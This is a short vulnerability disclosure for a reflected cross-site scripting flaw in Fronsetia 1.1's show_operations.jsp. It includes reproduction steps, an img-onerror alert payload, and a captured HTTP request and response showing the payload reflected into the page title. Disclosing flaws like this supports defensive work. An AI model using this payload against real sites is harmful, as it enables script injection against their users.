    # Exploit Title: Reflected XSS - fronsetiav1.1# Date: 11/2024# Exploit Author: Andrey Stoykov# Version: 1.1# Tested on: Debian 12# Blog:https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.htmlReflected XSS #1 - "show_operations.jsp"Steps to Reproduce:1. Visit main page of the application.2. In the input field of "WSDL Location" enter the following payload "><imgsrc=x onerror=alert(1)>// HTTP GET RequestGET/fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3EHTTP/1.1Host: 192.168.78.128:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0)Gecko/20100101 Firefox/133.0[...]// HTTP ResponseHTTP/1.1 200Content-Type: text/html;charset=ISO-8859-1Content-Length: 6360Date: Wed, 20 Nov 2024 19:42:15 GMTKeep-Alive: timeout=20Connection: keep-alive[...]<title> Fronsetia: "><img src=x onerror=alert(1)> </title>[...]

Tag

#intel